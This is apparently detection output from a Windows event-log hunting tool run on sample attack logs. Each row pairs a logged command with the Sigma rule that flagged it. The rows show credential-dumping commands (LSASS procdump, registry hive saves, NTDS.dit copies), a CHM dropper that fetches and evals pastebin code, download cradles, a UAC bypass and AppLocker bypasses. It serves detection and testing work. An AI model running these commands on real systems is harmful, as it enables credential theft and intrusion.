00:11:21.105 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\system system : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:23.317 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security"" : Path: C:\Windows\System32\cmd.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:23.336 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\security security : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.549 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Suspicious Use of Procdump on LSASS,,rules/sigma/process_creation/win_susp_procdump_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Renamed ProcDump,,rules/sigma/process_creation/win_renamed_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,LSASS Memory 
Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,Suspicious Use of Procdump,,rules/sigma/process_creation/win_susp_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,low,Usage of Sysinternals Tools,,rules/sigma/process_creation/process_creation_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,medium,Procdump Usage,,rules/sigma/process_creation/win_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.686 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.852 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.884 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.971 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: vssadmin.exe create shadow /for=C: : Path: C:\Windows\System32\vssadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""vssadmin.exe create shadow /for=C:""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:26.989 +09:00,MSEDGEWIN10,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.082 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extract\ntds.dit"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.169 +09:00,MSEDGEWIN10,1,high,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Extract\VSC_SYSTEM_HIVE"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.202 +09:00,MSEDGEWIN10,1,high,Copying Sensitive Files with Credential Data,,rules/sigma/process_creation/win_copying_sensitive_files_with_credential_data.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.233 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:27.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\SYSTEM 
C:\Extract\SYSTEM_HIVE : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SYSTEM C:\Extract\SYSTEM_HIVE""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:50.764 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:12:05.755 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\NOTEPAD.EXE"" C:\AtomicRedTeam\atomics\T1003\T1003.md : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm : Path: C:\Windows\hh.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 16:39:14.375 +09:00,MSEDGEWIN10,1,high,HH.exe Execution,,rules/sigma/process_creation/win_hh_chm.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c copy 
/Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe > nul && %%TEMP%%\out.exe javascript:""\..\mshtml RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WinHttp.WinHttpRequest.5.1"");h.Open(""GET"",""http://pastebin.com/raw/y2CjnRtH"",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im out.exe"",0,true);} : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\hh.exe"" C:\Users\IEUser\Desktop\Fax Record N104F.chm",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,high,HTML Help Shell Spawn,,rules/sigma/process_creation/win_html_help_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" : Path: C:\Users\IEUser\Downloads\UACBypass.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: PrivEsc - UACBypass Mocking Trusted WinFolders : Command: ""C:\Windows 
\System32\winSAT.exe"" formal : Path: C:\Windows \System32\winSAT.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,critical,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.161 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6820 324 0000022557280720 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: PrivEsc - UACBypass Mocking Trusted WinFolders : Command: ""C:\Windows \System32\winSAT.exe"" formal : Path: C:\Windows \System32\winSAT.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,critical,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-30 06:11:17.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", : Path: 
C:\Windows\System32\control.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,high,Suspicious Call by Ordinal,,rules/sigma/process_creation/win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\wscript.exe"" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt : Path: 
C:\Windows\SysWOW64\wscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:32:55.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6336 362 00000298E04230D0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:57.633 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c certutil -f -decode fi.b64 AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil 
Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:58.711 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: certutil -f -decode fi.b64 AllTheThings.dll : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c certutil -f -decode fi.b64 AllTheThings.dll ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.193 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source 
https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : 
User: MSEDGEWIN10\IEUser : Parent Command: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,high,Suspicious Bitsadmin Job via PowerShell,,rules/sigma/process_creation/win_powershell_bitsjob.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:04.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.318 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,low,Possible Applocker 